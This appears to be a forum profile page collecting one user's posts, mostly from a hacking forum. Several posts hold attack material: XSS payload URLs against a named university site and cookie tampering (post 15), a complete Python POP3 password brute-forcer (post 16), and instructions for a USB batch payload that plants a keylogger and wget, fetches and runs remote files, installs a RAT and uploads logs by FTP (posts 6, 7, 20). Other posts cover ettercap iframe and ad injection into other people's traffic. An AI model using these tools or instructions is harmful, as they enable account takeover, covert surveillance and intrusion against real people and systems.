Jump to content

DingleBerries

Dedicated Members
  • Posts

    1,291
  • Joined

  • Last visited

Everything posted by DingleBerries

  1. When I told my parents I use linux they though I was using drugs.
  2. Not atm, I have a bunch of school work and supporting this doesnt provide income/education... soo when I get some time, maybe next week, Ill redo a bunch of shit and update the release.
  3. Hey, I am looking for interesting links on satellite security. I just finished writing to both NASA and the NSA about it, I know now Ill be under their radar but thats fine with me. Ive seen some interesting things done with HAM radios, intercepting images, ect. I am mostly interested in encryption and out dated bodies. How do they handle the new encryption, are they able to update(soviet era). I do not need information on hacking them, more or less what is inside or what regulation they have to follow. Already googled
  4. You are right. I get to working on that sometime soon.
  5. Hyde, when and where. Free booze + geeks + computers... what could go wrong?
  6. Its running one extra command; cd SYS VOLUME. I have a person payload that uses that folder. So If you want you can make a folder named SYS VOLUME and put all the other stuff in there and I will work the same way. To add the keylogger add this to the begining of the batch file xcopy keylogger.exe C:\\Where\ever\ it whould copy it and then carry out the rest of the instructions
  7. The FLASH folders CONTENTS go in the root of the flash drive, not the folder its self. There is no key logger in the payload... If you read the code in the bat, which runs the shit from flash, will will see how most of it works.. That is why I encouraged people to add to this. If you cant figure it out then I dont really care, It has worked on all the systems I have tested it on.
  8. I thought the PS3 already did this.
  9. While we are on the topic is also looks like rhapsody may have some XSS vulns. Might do more with it later. http://play.rhapsody.com/playlistcentral/p...3C%3C/SCRIPT%3E
  10. Timmay313, what you've just said is one of the most insanely idiotic things I have ever heard. At no point in your rambling, incoherent response were you even close to anything that could be considered a rational thought. Everyone on this forum is now dumber for having read it. I award you no points, and may God have mercy on your soul.
  11. http://www.msoe.edu/campus/directory/detai...d=borowicz&pageTitle= that is a div so renaming that will help get you in the right direction jmaxxz
  12. I do not know about shift, but I live in a heavily populate area and getting people to hop on mine wouldn't be very hard. Most of them spend their extra time on facebook so I have been looking over the html of that to see if i cant find some nifty was of injecting ads there.
  13. http://chriswoodall.weebly.com/programs.html
  14. If you bake me brownies I will do it. Seriously and you have to PROMISE that you will send them to me.
  15. http://www.msoe.edu/campus/directory/detai...3E%3C/SCRIPT%3E http://www.msoe.edu/campus/directory/detai...13237.gif%22%3E can i has prize nao? If you want to you can even design a new layout via .js. XSS is a wonderful thing. Adding .swf http://www.msoe.edu/campus/directory/detai...%3E%3C/EMBED%3E you can also control the size with other params type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="10000" height="10000" Editing html... this is pretty good stuff if you know how to use it. http://www.msoe.edu/campus/directory/detai...Y%3E%3C/HTML%3E Edit cookies (use ID will now be SHIT) http://www.msoe.edu/campus/directory/detai...ERID=SHIT%22%3E Now you can do other things but since that site is played out I am done.. I think I have done enough
  16. Have you scanned the host with nmap? Are there other services running? Here is your code #!usr/bin/python #Pop3 Brute Forcer #d3hydr8[at]gmail[dot]com import threading, time, random, sys, poplib from copy import copy if len(sys.argv) !=4: print "Usage: ./popbrute.py <server> <userlist> <wordlist>" sys.exit(1) try: users = open(sys.argv[2], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) try: pop = poplib.POP3(sys.argv[1]) welcome = pop.getwelcome() pop.quit() except (poplib.error_proto): welcome = "No Response" pass print "\n\t d3hydr8[at]gmail[dot]com popBruteForcer v1.0" print "\t--------------------------------------------------\n" print "[+] Server:",sys.argv[1] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+] Server response:",welcome,"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "Reloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() return value[0][:-1], users[0][:-1] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"*12 print "User:",user,"Password:",value pop = poplib.POP3(sys.argv[1]) pop.user(user) pop.pass_(value) print "\t\nLogin successful:",value, user print pop.stat() pop.quit() work.join() sys.exit(2) except (poplib.error_proto), msg: #print "An error occurred:", msg pass for i in range(len(words)*len(users)): work = Worker() work.start() time.sleep(1)
  17. It has to be mounted in order to for the computer to transfer data to it.. What I would do is try to run it in linux with wine and wireshark to monitor what exactly is going between the device and the computer. There are also tools for windows for this same thing, but linux does it by default :P.
  18. Here are a few things I have thought up and read so far. Use mod_rewrite for Squid to place ads in pages. Have ettercap put an invisible iframe in every page :) Ettercap again to issue a js command to open popups Here is a great link: http://forums.whirlpool.net.au/forum-repli...cfm/795955.html
  19. If you find a way to do this I would really like to know. I was things about doing something like with with OpenWRT, yay google ad sense.
  20. Once python is installed, windows or linux, then you double click the pyw(windows) or ./client.pyw(linux). A gui will pop up asking to the IPaddress and below that there is a place to send commands. If you want to modify the payload add wget.exe to the CD partition and have it copy to the System root, best if you rename it, then you can download files from online and execute them via cmd. This is useful if you have a better RAT, i.e Poison IVY, and want to install the server to the remote computer. To add wget just modify the batch file xcopy wget.exe C:\Windows\System32 And if you add the keylogger to it Windows has a built in ftp command. That means you can remotely upload the log file to some ftp server and read the contents without going back. Just like in linux there are a lot of things that can be done via command line in windows, just read and research. THE MORE YOU KNOW! Also I havent tested it, but does the batch file show a windows when the drive is inserted? Or are there any signs, other than opening Task Manager, that the payload is running?
  21. I personally like this one, VIA TestMAD; http://www.webstandards.org/2009/04/01/pur...worm-uncovered/
  22. You are sorta right, IMO. Both of them are throwing shit at the wall to see what sticks so either way you are trying to brute force it, only with a dictionary you have a predefined set of words. Depending on what he is running as the POP3 server it shouldnt be that hard. Admin, HISNAME, CONTACT @whatever.com. A bruteforce attack is going to do some stupid shit and get picked up fairly quickly with a decent IDS. Go with a word list, and Python.
  23. Hold the "shift" key when you insert it.
  24. April Fools http://www.metasploit.com/framework/download/ Damnit digip already posted.
×
×
  • Create New...